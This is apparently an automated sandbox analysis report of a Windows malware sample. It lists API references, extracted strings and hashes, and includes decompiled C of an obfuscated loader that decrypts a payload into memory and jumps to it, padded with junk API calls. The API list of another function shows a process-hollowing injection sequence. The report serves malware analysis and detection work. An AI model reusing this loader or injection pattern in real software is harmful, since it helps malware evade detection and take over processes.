0x00405a21
0x00405a29
0x00405a31
0x00405a39
0x00405a41
0x00405a49
0x00405a51
0x00405a59
0x00405a61
0x00405a69
0x00405a71
0x00405a79
0x00405a81
0x00405a89
0x00405a91
0x00405a99
0x00405aa1
0x00405aa9
0x00405ab1
0x00405ab9
0x00405ac1
0x00405ac9
0x00405ad1
0x00405ad9
0x00405ae1
0x00405ae9
0x00405af1
0x00405af9
0x00405b01
0x00405b09
0x00405b11
0x00405b19
0x00405b21
0x00405b29
0x00405b31
0x00405b39
0x00405b41
0x00405b49
0x00405b51
0x00405b59
0x00405b61
0x00405b69
0x00405b71
0x00405b79
0x00405b81
0x00405b89
0x00405b91
0x00405b99
0x00405ba1
0x00405ba9
0x00405bb1
0x00405bb9
0x00405bc1
0x00405bc9
0x00405bd1
0x00405bd9
0x00405be1
0x00405be9
0x00405bf1
0x00405bf9
0x00405c01
0x00405c09
0x00405c11
0x00405c19
0x00405c21
0x00405c29
0x00405c31
0x00405c39
0x00405c41
0x00405c49
0x00405c51
0x00405c59
0x00405c61
0x00405c69
0x00405c71
0x00405c79
0x00405c81
0x00405c89
0x00405c91
0x00405c99
0x00405ca1
0x00405ca9
0x00405cb1
0x00405cb9
0x00405cc1
0x00405cc9
0x00405cd1
0x00405cd9
0x00405ce1
0x00405ce9
0x00405cf1
0x00405cf9
0x00405d01
0x00405d09
0x00405d11
0x00405d19
0x00405d21
0x00405d29
0x00405d31
0x00405d39
0x00405d41
0x00405d49
0x00405d51
0x00405d59
0x00405d61
0x00405d69
0x00405d71
0x00405d79
0x00405d81
0x00405d89
0x00405d91
0x00405d99
0x00405da1
0x00405da9
0x00405db1
0x00405db9
0x00405dc1
0x00405dc9
0x00405dd1
0x00405dd9
0x00405de1
0x00405de9
0x00405df1
0x00405df9
0x00405e01
0x00405e09
0x00405e11
0x00405e19
0x00405e21
0x00405e29
0x00405e31
0x00405e39
0x00405e41
0x00405e49
0x00405e51
0x00405e59
0x00405e61
0x00405e69
0x00405e71
0x00405e79
0x00405e81
0x00405e89
0x00405e91
0x00405e99
0x00405ea1
0x00405ea9
0x00405eb1
0x00405eb9
0x00405ec1
0x00405ec9
0x00405ed1
0x00405ed8
0x00405eea
0x00405ef3
0x00405efa
0x00405f00
0x00405f05
0x00405f06
0x00405f0c
0x00405f14
0x00405f19
0x00405f1a
0x00405f21
0x00405f28
0x00405f2e
0x00405f30
0x00405f31
0x00405f36
0x00405f3b
0x00405f4b
0x00405f50
0x00405f53
0x00405f54
0x00405f5a
0x00405f5b
0x00405f5c
0x00405f5d
0x00405f62
0x00405f63
0x00405f65
0x00405f67
0x00405f6a
0x00405f6f
0x00405f72
0x00405f78
0x00405f7a
0x00405f7c
0x00405f7f
0x00405f84
0x00405f86
0x00405f95
0x00405f95
0x00405f9f
0x00405fa5
0x00405faa
0x00405fb4
0x00405fb9
0x00405fc8
0x00405fd3

APIs

GetLastError.KERNEL32 ref: 004058CB
TransactNamedPipe.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004058D8
WriteConsoleA.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405EEA
IsProcessInJob.KERNEL32(00000000,00000000,00000000), ref: 00405EF3
GetPriorityClass.KERNEL32(00000000), ref: 00405EFA
_fprintf.LIBCMT ref: 00405F06

Part of subcall function 0040617D: __lock.LIBCMT ref: 0040619B
Part of subcall function 0040617D: ___sbh_find_block.LIBCMT ref: 004061A6
Part of subcall function 0040617D: ___sbh_free_block.LIBCMT ref: 004061B5
Part of subcall function 0040617D: HeapFree.KERNEL32(00000000,00000001,00416D00,0000000C,00407651,00000000,00416E70,0000000C,0040768B,00000001,?,?,004113F5,00000004,004171A8,0000000C), ref: 004061E5
Part of subcall function 0040617D: GetLastError.KERNEL32(?,004113F5,00000004,004171A8,0000000C,0040D6D2,00000001,?,00000000,00000000,00000000,?,0040BD22,00000001,00000214), ref: 004061F6

_malloc.LIBCMT ref: 00405F28

Part of subcall function 0040625A: __FF_MSGBANNER.LIBCMT ref: 0040627D
Part of subcall function 0040625A: __NMSG_WRITE.LIBCMT ref: 00406284
Part of subcall function 0040625A: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,0040D688,00000001,00000001,00000001,?,004075FA,00000018,00416E70,0000000C,0040768B), ref: 004062D1

_printf.LIBCMT ref: 00405F3B
__wfopen_s.LIBCMT ref: 00405F4B

Part of subcall function 004064AE: _flsall.LIBCMT ref: 004064C2

_fseek.LIBCMT ref: 00405F5D

Part of subcall function 00404B2A: __floor_pentium4.LIBCMT ref: 00404B3C

_puts.LIBCMT ref: 00405F72
LoadLibraryA.KERNEL32(kernel32.dll), ref: 00405F9F

Strings

msimg32.dll, xrefs: 00405F36
/Y, xrefs: 00405E09
Cgx, xrefs: 00405AB1
NKR[, xrefs: 00405BD9
0.txt, xrefs: 00405F45
]q0r, xrefs: 00405CC9
yLmc, xrefs: 00405B69
EuY, xrefs: 00405CD1
kernel32.dll, xrefs: 00405F9A
eVS, xrefs: 00405EC9
pumitafoto, xrefs: 00405F00
/fY., xrefs: 00405B99
%s %c, xrefs: 00405F31
tf71, xrefs: 00405B61
+F28, xrefs: 00405E69
5[$', xrefs: 00405C79

Memory Dump Source

Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ErrorHeapLast$AllocateClassConsoleFreeLibraryLoadNamedPipePriorityProcessTransactWrite___sbh_find_block___sbh_free_block__floor_pentium4__lock__wfopen_s_flsall_fprintf_fseek_malloc_printf_puts
String ID: %s %c$+F28$/Y$/fY.$0.txt$5[$'$Cgx$NKR[$]q0r$eVS$kernel32.dll$msimg32.dll$pumitafoto$tf71$yLmc$EuY
API String ID: 1973602647-887915793
Opcode ID: 310da69f1d45eb86b60e88712452ebc0e1e18f9478f8da6a3de34449216fee14
Instruction ID: 50e6c1943cef447edd8285822ae666dec573e84210a2f4063047f0d204c6772e
Opcode Fuzzy Hash: 310da69f1d45eb86b60e88712452ebc0e1e18f9478f8da6a3de34449216fee14
Instruction Fuzzy Hash: C0F133B28097809FD3A08F66C58850FFBF0BFA57A4F244A0CF29516560E7758A84CF4B

Uniqueness

Uniqueness Score: -1.00%

Function 008E0110 Relevance: 22.7, APIs: 15, Instructions: 248
memorynativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 008E0156
GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 008E016C
CreateProcessA.KERNELBASE(?,00000000), ref: 008E0255
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 008E0270
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 008E0283
GetThreadContext.KERNELBASE(00000000,?), ref: 008E029F
ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 008E02C8
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 008E02E3
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 008E0304
NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 008E032A
NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 008E0399
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 008E03BF
SetThreadContext.KERNELBASE(00000000,?), ref: 008E03E1
ResumeThread.KERNELBASE(00000000), ref: 008E03ED
ExitProcess.KERNEL32(00000000), ref: 008E0412

Memory Dump Source

Source File: 00000000.00000002.248746882.00000000008E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_file.jbxd

Similarity

API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
String ID:
API String ID: 2875986403-0
Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction ID: 109884960e1799c479e82f1449c412e94f693f959dad316c069fd378ee5d2253
Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction Fuzzy Hash: 05B1C874A00208AFDB44CF98C895F9EBBB5FF88314F248158E549AB395D771AD81CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00404EC6 Relevance: 84.5, APIs: 24, Strings: 24, Instructions: 460
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E00404EC6() {
				void* _v6;
				short _v8;
				char _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				struct _cpinfo _v356;
				char _v420;
				void _v1444;
				char _v2468;
				char _v4516;
				void* _t514;
				void* _t660;
				void* _t661;
				void* _t698;
				void* _t699;
				void* _t700;
				void* _t701;

				E0040E260(0x11a4);
				if( *0x4450c4 == 0x412) {
					E0040650A(0);
					_push(0);
					E00406520();
					_pop(_t660);
					E00406E58(0);
				}
				 *0x4450c4 =  *0x4450c4 + 0xb2d3b;
				 *0x444e94 = GetModuleHandleW(L"kernel32.dll"); // executed
				_t514 = LocalAlloc(0,  *0x4450c4); // executed
				 *0x444e90 = _t514; // executed
				E00404E1C(_t660); // executed
				_t698 = 0;
				if( *0x4450c4 > 0) {
					do {
						 *((char*)( *0x444e90 + _t698)) =  *((intOrPtr*)( *0x4450c8 + _t698 + 0xb2d3b));
						if( *0x4450c4 == 0x292) {
							__imp__CreateJobObjectA(0, "kowax");
						}
						_t698 = _t698 + 1;
					} while (_t698 <  *0x4450c4);
				}
				_t699 = 0;
				do {
					if( *0x4450c4 + _t699 == 0x5e) {
						SetFileAttributesA("pawujagobovalewobukalokaw", 0);
						GetProfileIntW(L"hiwapikijokutopesowayuzali", L"pudecebubafafelomulawogosu", 0);
						GetCPInfo(0,  &_v356);
						FoldStringA(0, 0, 0, 0, 0);
						GetVolumeInformationA(0,  &_v2468, 0,  &_v28,  &_v20,  &_v16,  &_v1444, 0);
						__imp__OpenJobObjectW(0, 0, L"ceyizevojapaxujekoxago");
						__imp__GetCalendarInfoW(0, 0, 0,  &_v4516, 0,  &_v24);
					}
					_t699 = _t699 + 1;
				} while (_t699 < 0x40c893);
				_t700 = 0;
				while(1) {
					GetLastError();
					if(_t700 < 0x1b92e5b) {
						_v132 = 0x67e462f3;
						_v124 = 0x5af06d69;
						_v16 = 0x550e6073;
						_v116 = 0x4b56b9f1;
						_v104 = 0x26994589;
						_v252 = 0x15985316;
						_v120 = 0x27020532;
						_v296 = 0x6b9abad0;
						_v108 = 0x3e73eb66;
						_v68 = 0x7117be28;
						_v276 = 0x5da604f3;
						_v244 = 0x5f7cd3d6;
						_v152 = 0x46721115;
						_v336 = 0x1a8f0345;
						_v280 = 0x50cc38f8;
						_v304 = 0x4a848631;
						_v188 = 0x12e177b5;
						_v236 = 0x1a4215b7;
						_v228 = 0x3b8c8b6a;
						_v96 = 0x701071da;
						_v220 = 0x4dde9e67;
						_v268 = 0x2138cdcc;
						_v100 = 0x79e12465;
						_v212 = 0x162df8c2;
						_v64 = 0x2e27f6b9;
						_v180 = 0x363c5601;
						_v172 = 0x53842e8a;
						_v224 = 0x43e591ec;
						_v60 = 0x5eebb39e;
						_v52 = 0x72b95c38;
						_v48 = 0x2de3b1b4;
						_v112 = 0x190b9d4e;
						_v92 = 0xfe4109f;
						_v184 = 0x54ae7bc5;
						_v204 = 0x1411b51d;
						_v272 = 0x68c2a4e4;
						_v32 = 0x25db7a5;
						_v200 = 0x6df25c1e;
						_v88 = 0x58a91d;
						_v40 = 0x23420a38;
						_v144 = 0x749db312;
						_v288 = 0x73b9f5d5;
						_v260 = 0x78838e04;
						_v312 = 0x789f54e0;
						_v80 = 0x5f80cd7c;
						_v176 = 0x723d872f;
						_v84 = 0x1c20b523;
						_v20 = 0x39933e29;
						_v76 = 0x6a6cdf36;
						_v248 = 0x2f4182c9;
						_v216 = 0x6ad8ef0c;
						_v148 = 0x3a6c434;
						_v164 = 0x11c906fe;
						_v264 = 0x402d3c3a;
						_v136 = 0x52ee4d1b;
						_v8 = 0x347c6d6c;
						_v208 = 0x11b0372a;
						_v44 = 0x2fbc9c79;
						_v196 = 0x583c1114;
						_v332 = 0x17263a72;
						_v36 = 0xce8ec49;
						_v328 = 0x205defbb;
						_v12 = 0x31df762c;
						_v56 = 0x448f7225;
						_v324 = 0x3063220d;
						_v232 = 0x2f8d2ea5;
						_v128 = 0x123be14;
						_v28 = 0x551450a8;
						_v316 = 0x22150baf;
						_v140 = 0x5cf25b83;
						_v160 = 0x6950ea8;
						_v24 = 0x63c398fe;
						_v72 = 0x57b6e36;
						_v256 = 0x688827b4;
						_v308 = 0x70571416;
						_v192 = 0x60f034a3;
						_v168 = 0x7d50f5eb;
						_v320 = 0x78cd8b6f;
						_v240 = 0x1fd366fc;
						_v300 = 0x530f435e;
						_v292 = 0x28187254;
						_v156 = 0x360de2c2;
						_v284 = 0x25b3a818;
						_v132 = _v132 + 0x5caa67d5;
						_v124 = _v124 + 0x3b4ed235;
						_v132 = _v132 + 0x9e62a32;
						_v116 = _v116 - 0x8187383;
						_v132 = _v132 + 0x4c135ce0;
						_v16 = _v16 - 0x57444216;
						_v252 = _v252 + 0x43039132;
						_v252 = _v252 - 0x4703250d;
						_v120 = _v120 - 0x17f9cbea;
						_v252 = _v252 - 0x5cb4ba90;
						_v132 = _v132 - 0x559ddfdf;
						_v252 = _v252 - 0x15219df6;
						_v252 = _v252 + 0x2ee0da94;
						_v124 = _v124 + 0x179c7ebc;
						_v252 = _v252 - 0x6ee50c3d;
						_v252 = _v252 + 0x736fd115;
						_v108 = _v108 + 0x58ac6b3;
						_v124 = _v124 - 0x2461dbba;
						_v124 = _v124 + 0x53166a3;
						_v296 = _v296 + 0x6067d7d6;
						_v108 = _v108 - 0x3a59ed01;
						_v116 = _v116 + 0x502aa82c;
						_v68 = _v68 + 0x40c398db;
						_v68 = _v68 + 0x5316f79;
						_v276 = _v276 + 0x5e5e1713;
						_v336 = _v336 - 0x5012eb95;
						_v276 = _v276 - 0x300a3d27;
						_v212 = _v212 - 0x40f1be80;
						_v100 = _v100 + 0x51907ee;
						_v16 = _v16 + 0x53bf2d2;
						_v252 = _v252 + 0x62a7deba;
						_v236 = _v236 - 0x15a282bd;
						_v124 = _v124 + 0x750cf09;
						_v268 = _v268 + 0x265a1b03;
						_v180 = _v180 - 0x7c55df99;
						_v244 = _v244 + 0x5c3f5cea;
						_v224 = _v224 + 0x5002a5aa;
						_v204 = _v204 - 0x452fd972;
						_v100 = _v100 + 0x5a859301;
						_v236 = _v236 + 0x5b406f7a;
						_v336 = _v336 - 0x554aef4c;
						_v68 = _v68 - 0x3a465d9d;
						_v296 = _v296 - 0x56a948ad;
						_v116 = _v116 + 0x76502a4c;
						_v280 = _v280 + 0x1c3c6481;
						_v224 = _v224 - 0x31062905;
						_v304 = _v304 - 0x19570b2c;
						_v112 = _v112 + 0x3720702c;
						_v16 = _v16 - 0x324c8da1;
						_v108 = _v108 + 0x37f2284d;
						_v296 = _v296 + 0x5e4b11c3;
						_v172 = _v172 - 0x72ffab49;
						_v204 = _v204 + 0x2b31abb;
						_v188 = _v188 + 0x3ab7a116;
						_v204 = _v204 + 0x45825cdf;
						_v52 = _v52 + 0x3949c1ed;
						_v244 = _v244 + 0x4b811fea;
						_v32 = _v32 - 0x4f9a4dab;
						_v84 = _v84 + 0x749ceff;
						_v204 = _v204 + 0x10bffb89;
						_v108 = _v108 - 0x2b0f6f5f;
						_v236 = _v236 + 0x3365b823;
						_v212 = _v212 - 0x42ff9f92;
						_v244 = _v244 + 0x32a1e7fb;
						_v76 = _v76 + 0x2058b3c;
						_v172 = _v172 + 0x988af5a;
						_v144 = _v144 + 0x196202ca;
						_v184 = _v184 - 0x7f832484;
						_v268 = _v268 - 0x12652de7;
						_v20 = _v20 - 0xeafcb8e;
						_v136 = _v136 - 0x141cfa96;
						_v296 = _v296 + 0x1d7db3b5;
						_v60 = _v60 - 0x63ba0c91;
						_v88 = _v88 - 0x1ee4938d;
						_v80 = _v80 + 0x7743f0d1;
						_v276 = _v276 - 0xac60d68;
						_v272 = _v272 - 0x1ce466d9;
						_v252 = _v252 - 0x400cde42;
						_v56 = _v56 + 0x7acaa60e;
						_v80 = _v80 - 0x6466e154;
						_v136 = _v136 - 0x3d665518;
						_v72 = _v72 - 0x2c800c08;
						_v68 = _v68 - 0x64c489e9;
					}
					GetSystemDefaultLCID();
					if(_t700 > 0x1b3afd6) {
						break;
					}
					_t700 = _t700 + 1;
					if(_t700 < 0x16bae1c0) {
						continue;
					}
					break;
				}
				E00404D37();
				_t661 = 0;
				do {
					if(_t661 == 0x770e) {
						E00404E02(_t661);
					}
					_t661 = _t661 + 1;
				} while (_t661 < 0x286b97d);
				_t701 = 0x7b;
				do {
					if( *0x4450c4 == 0xf) {
						__imp__FindActCtxSectionStringW(0, 0, 0, 0,  &_v420);
					}
					_t701 = _t701 - 1;
				} while (_t701 != 0);
				_v12 = 0x184cc;
				do {
					if( *0x4450c4 == 0x1833b) {
						__imp__GetVolumePathNameA("yeyofatuw layesoxegejepofazugazotigitohoni lohoma",  &_v2468, 0);
						FindFirstChangeNotificationA(0, 0, 0);
						WriteConsoleW(0,  &_v1444, 0,  &_v16, 0);
						GetFileAttributesA(0);
						TlsSetValue(0, 0);
						__imp__GetConsoleAliasesW( &_v4516, 0, 0);
						EnumSystemCodePagesW(0, 0);
						GetFileAttributesA(0);
						__imp__GetVolumeNameForVolumeMountPointA(0, 0, 0);
						_v8 = 0;
						asm("stosw");
						_push( &_v20);
						_push(_v8);
						_push(0);
						_push(0);
						_push(0);
						FillConsoleOutputCharacterW();
						FoldStringW(0, 0, 0, 0, 0);
					}
					_t509 =  &_v12;
					 *_t509 = _v12 - 1;
				} while ( *_t509 != 0);
				E00404B4D();
				return  *0x444e90();
			}

0x00404ece
0x00404ee0
0x00404ee5
0x00404eea
0x00404eeb
0x00404ef1
0x00404ef3
0x00404ef3
0x00404ef8
0x00404f16
0x00404f1b
0x00404f21
0x00404f26
0x00404f2b
0x00404f33
0x00404f35
0x00404f47
0x00404f54
0x00404f5c
0x00404f5c
0x00404f62
0x00404f63
0x00404f35
0x00404f6b
0x00404f6d
0x00404f77
0x00404f7f
0x00404f90
0x00404f9e
0x00404fa9
0x00404fcc
0x00404fd9
0x00404fee
0x00404fee
0x00404ff4
0x00404ff5
0x00405001
0x00405003
0x00405003
0x0040500f
0x00405015
0x0040501c
0x00405023
0x0040502a
0x00405031
0x00405038
0x00405042
0x00405049
0x00405053
0x0040505a
0x00405061
0x0040506b
0x00405075
0x0040507f
0x00405089
0x00405093
0x0040509d
0x004050a7
0x004050b1
0x004050bb
0x004050c2
0x004050cc
0x004050d6
0x004050dd
0x004050e7
0x004050ee
0x004050f8
0x00405102
0x0040510c
0x00405113
0x0040511a
0x00405121
0x00405128
0x0040512f
0x00405139
0x00405143
0x0040514d
0x00405154
0x0040515e
0x00405165
0x0040516c
0x00405176
0x00405180
0x0040518a
0x00405194
0x0040519b
0x004051a5
0x004051ac
0x004051b3
0x004051ba
0x004051c4
0x004051ce
0x004051d8
0x004051e2
0x004051ec
0x004051f6
0x004051fd
0x00405207
0x0040520e
0x00405218
0x00405222
0x00405229
0x00405233
0x0040523a
0x00405241
0x0040524b
0x00405255
0x0040525c
0x00405263
0x0040526d
0x00405277
0x00405281
0x00405288
0x0040528f
0x00405299
0x004052a3
0x004052ad
0x004052b7
0x004052c1
0x004052cb
0x004052d5
0x004052df
0x004052e9
0x004052f3
0x004052fa
0x0040530c
0x0040531e
0x00405325
0x0040532c
0x00405333
0x0040534e
0x00405358
0x0040535f
0x00405369
0x00405386
0x00405390
0x0040539a
0x004053a1
0x004053ab
0x004053d1
0x004053d8
0x004053df
0x004053f1
0x00405406
0x0040540d
0x00405414
0x0040541b
0x00405422
0x00405437
0x00405441
0x0040544b
0x00405455
0x0040545c
0x00405474
0x004054a5
0x004054af
0x004054b6
0x004054c0
0x004054ca
0x004054f0
0x004054fa
0x00405504
0x0040550b
0x00405515
0x0040551f
0x00405526
0x00405530
0x00405537
0x00405541
0x0040554b
0x00405555
0x00405567
0x0040556e
0x00405580
0x0040558a
0x00405594
0x0040559e
0x004055a8
0x004055b2
0x004055e6
0x0040560c
0x00405613
0x0040561a
0x00405624
0x0040562b
0x00405640
0x00405655
0x0040565f
0x00405666
0x00405670
0x0040567a
0x0040568f
0x004056aa
0x004056b1
0x004056bb
0x004056c5
0x004056cc
0x004056de
0x004056e5
0x00405711
0x0040572c
0x00405747
0x0040574e
0x00405755
0x00405770
0x00405777
0x00405789
0x0040578f
0x0040579b
0x00000000
0x00000000
0x0040579d
0x004057a4
0x00000000
0x00000000
0x00000000
0x004057a4
0x004057aa
0x004057af
0x004057b1
0x004057b7
0x004057b9
0x004057b9
0x004057be
0x004057bf
0x004057c9
0x004057ca
0x004057d1
0x004057de
0x004057de
0x004057e4
0x004057e4
0x004057ed
0x004057f4
0x004057fe
0x00405811
0x0040581a
0x0040582e
0x00405835
0x00405839
0x00405848
0x00405850
0x00405857
0x0040585c
0x00405864
0x0040586b
0x00405870
0x00405871
0x00405874
0x00405875
0x00405876
0x00405877
0x00405882
0x00405882
0x00405888
0x00405888
0x00405888
0x00405891
0x004058a0

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00404F07
LocalAlloc.KERNELBASE(00000000), ref: 00404F1B
CreateJobObjectA.KERNEL32(00000000,kowax), ref: 00404F5C
SetFileAttributesA.KERNEL32(pawujagobovalewobukalokaw,00000000), ref: 00404F7F
GetProfileIntW.KERNEL32 ref: 00404F90
GetCPInfo.KERNEL32(00000000,?), ref: 00404F9E
FoldStringA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00404FA9
GetVolumeInformationA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 00404FCC
OpenJobObjectW.KERNEL32 ref: 00404FD9
GetCalendarInfoW.KERNEL32(00000000,00000000,00000000,?,00000000,?), ref: 00404FEE
GetLastError.KERNEL32 ref: 00405003

Part of subcall function 0040650A: __wcstoi64.LIBCMT ref: 00406516

Part of subcall function 00406E58: _doexit.LIBCMT ref: 00406E64

GetSystemDefaultLCID.KERNEL32(12652DE7,78838E04,5CF25B83,32A1E7FB,7F832484,723D872F,63BA0C91,03A6C434,3A465D9D,5F80CD7C,23420A38,3720702C,78838E04,3B8C8B6A,723D872F,17F9CBEA), ref: 0040578F
FindActCtxSectionStringW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 004057DE
GetVolumePathNameA.KERNEL32 ref: 00405811
FindFirstChangeNotificationA.KERNEL32(00000000,00000000,00000000), ref: 0040581A
WriteConsoleW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040582E
GetFileAttributesA.KERNEL32(00000000), ref: 00405835
TlsSetValue.KERNEL32(00000000,00000000), ref: 00405839
GetConsoleAliasesW.KERNEL32(?,00000000,00000000), ref: 00405848
EnumSystemCodePagesW.KERNEL32(00000000,00000000), ref: 00405850
GetFileAttributesA.KERNEL32(00000000), ref: 00405857
GetVolumeNameForVolumeMountPointA.KERNEL32(00000000,00000000,00000000), ref: 0040585C
FillConsoleOutputCharacterW.KERNEL32(00000000,00000000,00000000,?,?), ref: 00405877
FoldStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00405882

Strings

kowax, xrefs: 00404F56
e$y, xrefs: 004050D6
:<-@, xrefs: 004051E2
LJU, xrefs: 00405515
2*, xrefs: 0040530C
'=0, xrefs: 00405441
zo@[, xrefs: 0040550B
l34T, xrefs: 0040537B
Tfd, xrefs: 0040574E
4h3?, xrefs: 00405601
lm|4, xrefs: 004051F6
pudecebubafafelomulawogosu, xrefs: 00404F86
hiwapikijokutopesowayuzali, xrefs: 00404F8B
L*Pv, xrefs: 00405530
"c0, xrefs: 00405241
\?\, xrefs: 004054CA
zs=A, xrefs: 004055B9
kernel32.dll, xrefs: 00404F02
ceyizevojapaxujekoxago, xrefs: 00404FD2
yeyofatuw layesoxegejepofazugazotigitohoni lohoma, xrefs: 0040580C
,p 7, xrefs: 00405555
8B#, xrefs: 00405165
fs>, xrefs: 00405053
pawujagobovalewobukalokaw, xrefs: 00404F7A

Memory Dump Source

Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Volume$AttributesConsoleFileString$FindFoldInfoNameObjectSystem$AliasesAllocCalendarChangeCharacterCodeCreateDefaultEnumErrorFillFirstHandleInformationLastLocalModuleMountNotificationOpenOutputPagesPathPointProfileSectionValueWrite__wcstoi64_doexit
String ID: "c0$'=0$,p 7$2*$4h3?$8B#$:<-@$L*Pv$LJU$Tfd$ceyizevojapaxujekoxago$e$y$fs>$hiwapikijokutopesowayuzali$kernel32.dll$kowax$l34T$lm|4$pawujagobovalewobukalokaw$pudecebubafafelomulawogosu$yeyofatuw layesoxegejepofazugazotigitohoni lohoma$zo@[$zs=A$\?\
API String ID: 4208290323-2628406891
Opcode ID: e9ad084592832fef35c52f3e197c68b7dae287ed2096ae596f42d6bc1f2f6982
Instruction ID: eabcc3d36a76018fd45fd1127a63d54f00c48212fc91d4c4cff7eda53df2b885
Opcode Fuzzy Hash: e9ad084592832fef35c52f3e197c68b7dae287ed2096ae596f42d6bc1f2f6982
Instruction Fuzzy Hash: 003230B5D01228DBCB608FA6DD89ADEBB74FF05304F208199E55ABB610D7304A85CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 008E0420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 008E0533

Strings

d, xrefs: 008E0584
0, xrefs: 008E0492
mfoaskdfnoa, xrefs: 008E0520, 008E0523
saodkfnosa9uin, xrefs: 008E04DA

Memory Dump Source

Source File: 00000000.00000002.248746882.00000000008E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_file.jbxd

Similarity

API ID: CreateWindow
String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
API String ID: 716092398-2341455598
